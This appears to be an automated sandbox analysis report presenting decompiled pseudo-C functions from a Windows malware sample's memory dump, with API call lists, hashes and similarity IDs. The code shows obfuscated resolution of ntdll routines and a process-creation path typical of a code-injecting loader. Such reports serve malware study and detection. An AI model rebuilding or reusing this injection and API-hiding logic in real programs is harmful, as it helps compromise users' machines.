                                                                                                                                                                                                                                				_t36 = E02BB6856(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                                                                                                                                                                                                				_v8 = _t36;
                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					return _v8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E02BBA929( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                                                                                                                                                                                                				_t40 = _v12(_v12);
                                                                                                                                                                                                                                				_v8 = _t40;
                                                                                                                                                                                                                                				if(_t40 == 0 && ( *0x2bbd298 & 0x00000001) != 0) {
                                                                                                                                                                                                                                					_v32 = 0;
                                                                                                                                                                                                                                					asm("stosd");
                                                                                                                                                                                                                                					asm("stosd");
                                                                                                                                                                                                                                					asm("stosd");
                                                                                                                                                                                                                                					_v108 = 0;
                                                                                                                                                                                                                                					memset( &_v104, 0, 0x40);
                                                                                                                                                                                                                                					_t47 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                					_t18 = _t47 + 0x2bbe3b3; // 0x73797325
                                                                                                                                                                                                                                					_t68 = E02BB1EBA(_t18);
                                                                                                                                                                                                                                					if(_t68 == 0) {
                                                                                                                                                                                                                                						_v8 = 8;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t50 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                						_t19 = _t50 + 0x2bbe760; // 0x52f8d08
                                                                                                                                                                                                                                						_t20 = _t50 + 0x2bbe0af; // 0x4e52454b
                                                                                                                                                                                                                                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                                                                                                                                						if(_t71 == 0) {
                                                                                                                                                                                                                                							_v8 = 0x7f;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_v108 = 0x44;
                                                                                                                                                                                                                                							E02BB7020();
                                                                                                                                                                                                                                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                                                                                                                                							_push(1);
                                                                                                                                                                                                                                							E02BB7020();
                                                                                                                                                                                                                                							if(_t58 == 0) {
                                                                                                                                                                                                                                								_v8 = GetLastError();
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								CloseHandle(_v28);
                                                                                                                                                                                                                                								CloseHandle(_v32);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						HeapFree( *0x2bbd270, 0, _t68);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t70 = _v16;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                                                                                                                                                                                                				E02BB53BB(_t70);
                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB6856: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BB74C1,?,00000001,?,?,00000000,00000000), ref: 02BB687B
                                                                                                                                                                                                                                  • Part of subcall function 02BB6856: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BB689D
                                                                                                                                                                                                                                  • Part of subcall function 02BB6856: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BB68B3
                                                                                                                                                                                                                                  • Part of subcall function 02BB6856: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BB68C9
                                                                                                                                                                                                                                  • Part of subcall function 02BB6856: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BB68DF
                                                                                                                                                                                                                                  • Part of subcall function 02BB6856: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BB68F5
                                                                                                                                                                                                                                • memset.NTDLL ref: 02BB750F
                                                                                                                                                                                                                                  • Part of subcall function 02BB1EBA: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02BB7528,73797325), ref: 02BB1ECB
                                                                                                                                                                                                                                  • Part of subcall function 02BB1EBA: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02BB1EE5
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(4E52454B,052F8D08,73797325), ref: 02BB7545
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02BB754C
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BB75B4
                                                                                                                                                                                                                                  • Part of subcall function 02BB7020: GetProcAddress.KERNEL32(36776F57,02BB6B1C), ref: 02BB703B
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000001), ref: 02BB7591
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02BB7596
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001), ref: 02BB759A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
• Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
• Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
• Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                                                                                                                • String ID: Uxt$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3075724336-2342693527
                                                                                                                                                                                                                                • Opcode ID: 4db708f08cb01f7f8cc423b0a4abaefc4568aed4605a32407a10cf9f7b3897dc
                                                                                                                                                                                                                                • Instruction ID: 6df9638dcb1fdec804437ab392f0b6563f3cb9e12b19fa52ccec7fd4748b2c74
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4db708f08cb01f7f8cc423b0a4abaefc4568aed4605a32407a10cf9f7b3897dc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD313372C00209AFDB129FA4DC88EEEBBBDEF44344F0144A5E545A7111D7B49E45DF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

C-Code - Quality: 27%
E02BB5E8A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
	intOrPtr _v8;
	intOrPtr _v12;
	long _v16;
	intOrPtr _v20;
	signed int _v24;
	void* __esi;
	long _t43;
	intOrPtr _t44;
	intOrPtr _t46;
	void* _t48;
	void* _t49;
	void* _t50;
	intOrPtr _t54;
	intOrPtr _t57;
	void* _t58;
	void* _t59;
	void* _t60;
	intOrPtr _t66;
	void* _t71;
	void* _t74;
	intOrPtr _t75;
	void* _t77;
	intOrPtr _t79;
	intOrPtr* _t80;
	intOrPtr _t91;

	_t79 =  *0x2bbd37c; // 0x52f9818
	_v24 = 8;
	_t43 = GetTickCount();
	_push(5);
	_t74 = 0xa;
	_v16 = _t43;
	_t44 = E02BB9CCC(_t74,  &_v16);
	_v8 = _t44;
	if(_t44 == 0) {
		_v8 = 0x2bbc1ac;
	}
	_t46 = E02BB1F9B(_t79);
	_v12 = _t46;
	if(_t46 != 0) {
		_t80 = __imp__;
		_t48 =  *_t80(_v8, _t71);
		_t49 =  *_t80(_v12);
		_t50 =  *_t80(_a4);
		_t54 = E02BB5157(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
		_v20 = _t54;
		if(_t54 != 0) {
			_t75 =  *0x2bbd2e0; // 0x273a5a8
			_t16 = _t75 + 0x2bbeb10; // 0x530025
			 *0x2bbd118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
			_push(4);
			_t77 = 5;
			_t57 = E02BB9CCC(_t77,  &_v16);
			_v8 = _t57;
			if(_t57 == 0) {
				_v8 = 0x2bbc1b0;
			}
			_t58 =  *_t80(_v8);
			_t59 =  *_t80(_v12);
			_t60 =  *_t80(_a4);
			_t91 = E02BB5157(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
			if(_t91 == 0) {
				E02BB53BB(_v20);
			} else {
				_t66 =  *0x2bbd2e0; // 0x273a5a8
				_t31 = _t66 + 0x2bbec30; // 0x73006d
				 *0x2bbd118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
				 *_a16 = _v20;
				_v24 = _v24 & 0x00000000;
				 *_a20 = _t91;
			}
		}
		E02BB53BB(_v12);
	}
	return _v24;
}





























                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BB5E9F
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 02BB5EDF
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 02BB5EE8
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 02BB5EEF
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(80000002), ref: 02BB5EFC
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,00000004), ref: 02BB5F5C
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 02BB5F65
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 02BB5F6C
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 02BB5F73
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2535036572-0
                                                                                                                                                                                                                                • Opcode ID: 44776a7d82764b286e7b1157f18183e6d198349dbb86b3d4b01c79230a50a34b
                                                                                                                                                                                                                                • Instruction ID: 3123875964d2919a349fcd6bc1dfee47ad8474220143e9d478014d637c93612a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44776a7d82764b286e7b1157f18183e6d198349dbb86b3d4b01c79230a50a34b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0415976D0020AEBCF22AFA4CC08EEEBBB5EF44344F0544A5E904A7211D7B5DA61DF91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 63%
                                                                                                                                                                                                                                			E02BB22AB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                                				intOrPtr _t13;
                                                                                                                                                                                                                                				char* _t28;
                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                				char* _t36;
                                                                                                                                                                                                                                				intOrPtr* _t40;
                                                                                                                                                                                                                                				char* _t41;
                                                                                                                                                                                                                                				char* _t42;
                                                                                                                                                                                                                                				char* _t43;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t34 = __edx;
                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                				_t9 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                				_t1 = _t9 + 0x2bbe62c; // 0x253d7325
                                                                                                                                                                                                                                				_t36 = 0;
                                                                                                                                                                                                                                				_t28 = E02BB1BB5(__ecx, _t1);
                                                                                                                                                                                                                                				if(_t28 != 0) {
                                                                                                                                                                                                                                					_t40 = __imp__;
                                                                                                                                                                                                                                					_t13 =  *_t40(_t28);
                                                                                                                                                                                                                                					_v8 = _t13;
                                                                                                                                                                                                                                					_t41 = E02BB5157(_v8 +  *_t40(_a4) + 1);
                                                                                                                                                                                                                                					if(_t41 != 0) {
                                                                                                                                                                                                                                						strcpy(_t41, _t28);
                                                                                                                                                                                                                                						_pop(_t33);
                                                                                                                                                                                                                                						__imp__(_t41, _a4);
                                                                                                                                                                                                                                						_t36 = E02BB73E0(_t34, _t41, _a8);
                                                                                                                                                                                                                                						E02BB53BB(_t41);
                                                                                                                                                                                                                                						_t42 = E02BB15FD(StrTrimA(_t36, "="), _t36);
                                                                                                                                                                                                                                						if(_t42 != 0) {
                                                                                                                                                                                                                                							E02BB53BB(_t36);
                                                                                                                                                                                                                                							_t36 = _t42;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t43 = E02BB698B(_t36, _t33);
                                                                                                                                                                                                                                						if(_t43 != 0) {
                                                                                                                                                                                                                                							E02BB53BB(_t36);
                                                                                                                                                                                                                                							_t36 = _t43;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					E02BB53BB(_t28);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t36;
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB1BB5: lstrlen.KERNEL32(00000000,00000000,00000000,770CC740,?,?,?,02BB22C5,253D7325,00000000,00000000,770CC740,?,?,02BBA714,?), ref: 02BB1C1C
                                                                                                                                                                                                                                  • Part of subcall function 02BB1BB5: sprintf.NTDLL ref: 02BB1C3D
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,02BBA714,?,052F95B0), ref: 02BB22D6
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,?,?,02BBA714,?,052F95B0), ref: 02BB22DE
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • strcpy.NTDLL ref: 02BB22F5
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 02BB2300
                                                                                                                                                                                                                                  • Part of subcall function 02BB73E0: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02BB230F,00000000,?,?,?,02BBA714,?,052F95B0), ref: 02BB73F7
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BBA714,?,052F95B0), ref: 02BB231D
                                                                                                                                                                                                                                  • Part of subcall function 02BB15FD: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02BB2329,00000000,?,?,02BBA714,?,052F95B0), ref: 02BB1607
                                                                                                                                                                                                                                  • Part of subcall function 02BB15FD: _snprintf.NTDLL ref: 02BB1665
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                • String ID: =
                                                                                                                                                                                                                                • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                • Opcode ID: 98edf6c10176265a5d10af34a87facb9880559517a931adf78282e79dfbad277
                                                                                                                                                                                                                                • Instruction ID: 5fd76484b63c4af30a9ce415d64d3996152cb888605cb7794605c22c8fc753ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98edf6c10176265a5d10af34a87facb9880559517a931adf78282e79dfbad277
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F211A3339015256B862377B89C84CFF3AAEDF897943098596FA4597200DEF8C9025BE1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB6246(intOrPtr _a4) {
                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                				unsigned int _t4;
                                                                                                                                                                                                                                				void* _t5;
                                                                                                                                                                                                                                				long _t6;
                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                				 *0x2bbd2a4 = _t2;
                                                                                                                                                                                                                                				if(_t2 == 0) {
                                                                                                                                                                                                                                					return GetLastError();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t4 = GetVersion();
                                                                                                                                                                                                                                				if(_t4 != 5) {
                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                					if(_t15 <= 0) {
                                                                                                                                                                                                                                						_t5 = 0x32;
                                                                                                                                                                                                                                						return _t5;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                					 *0x2bbd294 = _t4;
                                                                                                                                                                                                                                					_t6 = GetCurrentProcessId();
                                                                                                                                                                                                                                					 *0x2bbd290 = _t6;
                                                                                                                                                                                                                                					 *0x2bbd29c = _a4;
                                                                                                                                                                                                                                					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                                                                                                                					 *0x2bbd28c = _t7;
                                                                                                                                                                                                                                					if(_t7 == 0) {
                                                                                                                                                                                                                                						 *0x2bbd28c =  *0x2bbd28c | 0xffffffff;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_t4 >> 8 > 0) {
                                                                                                                                                                                                                                					goto L5;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t15 = _t4 - _t4;
                                                                                                                                                                                                                                				goto L4;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02BB4D41,?,?,00000001,?,?,?,02BB5992,?), ref: 02BB624E
                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000001,?,?,?,02BB5992,?), ref: 02BB625D
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02BB5992,?), ref: 02BB6279
                                                                                                                                                                                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02BB5992,?), ref: 02BB6296
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000001,?,?,?,02BB5992,?), ref: 02BB62B5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 2270775618-1701360479
                                                                                                                                                                                                                                • Opcode ID: 1c2695c37bbec12de7f759dda8e93d91fd458f67ce691ae8df5cd2518ab35d7f
                                                                                                                                                                                                                                • Instruction ID: c4d7624046d3a3dbc89ec888ba0888fc5137fe72b5b6918ef15023676f0ac5d5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c2695c37bbec12de7f759dda8e93d91fd458f67ce691ae8df5cd2518ab35d7f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2F06D74E803029FEA178B24A819B693B69EB05791F00092AE5C6C72C0D7F4C820CF15
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 02BB1143
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(0070006F), ref: 02BB1157
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 02BB1169
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB11D1
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB11E0
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB11EB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                                                • Opcode ID: 8e5d36c099f4e239a52e644a908d0759da347a2eb5de0cf95c9cfd6a1b984046
                                                                                                                                                                                                                                • Instruction ID: 0e002af3aa3648c4700196582575d22269d7ffbffec353e99935981342b31202
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e5d36c099f4e239a52e644a908d0759da347a2eb5de0cf95c9cfd6a1b984046
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD416D36D10609AFDB02DFBCD844AEEB7BAEF49304F144466ED14EB210DBB19945CBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB6856(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _t23;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                				intOrPtr _t30;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                                				intOrPtr _t36;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                                                				intOrPtr _t44;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t48;
                                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t54 = E02BB5157(0x20);
                                                                                                                                                                                                                                				if(_t54 == 0) {
                                                                                                                                                                                                                                					_v8 = 8;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t23 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                					_t1 = _t23 + 0x2bbe11a; // 0x4c44544e
                                                                                                                                                                                                                                					_t48 = GetModuleHandleA(_t1);
                                                                                                                                                                                                                                					_t26 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                					_t2 = _t26 + 0x2bbe782; // 0x7243775a
                                                                                                                                                                                                                                					_v8 = 0x7f;
                                                                                                                                                                                                                                					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                                                                                                                					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                                                					if(_t28 == 0) {
                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                						E02BB53BB(_t54);
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t30 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                						_t5 = _t30 + 0x2bbe76f; // 0x614d775a
                                                                                                                                                                                                                                						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                                                                                                                						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                                                                                							goto L8;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t33 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                							_t7 = _t33 + 0x2bbe4ce; // 0x6e55775a
                                                                                                                                                                                                                                							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                                                                                                                							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                                                							if(_t35 == 0) {
                                                                                                                                                                                                                                								goto L8;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t36 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                								_t9 = _t36 + 0x2bbe406; // 0x4e6c7452
                                                                                                                                                                                                                                								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                                                                                                                								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                                                								if(_t38 == 0) {
                                                                                                                                                                                                                                									goto L8;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t39 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                									_t11 = _t39 + 0x2bbe792; // 0x6c43775a
                                                                                                                                                                                                                                									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                                                                                                                									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                                                									if(_t41 == 0) {
                                                                                                                                                                                                                                										goto L8;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                                                										_t44 = E02BB5C55(_t54, _a8);
                                                                                                                                                                                                                                										_v8 = _t44;
                                                                                                                                                                                                                                										if(_t44 != 0) {
                                                                                                                                                                                                                                											goto L8;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											 *_a12 = _t54;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v8;
                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BB74C1,?,00000001,?,?,00000000,00000000), ref: 02BB687B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BB689D
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BB68B3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BB68C9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BB68DF
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BB68F5
                                                                                                                                                                                                                                  • Part of subcall function 02BB5C55: memset.NTDLL ref: 02BB5CD4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$AllocateHandleHeapModulememset
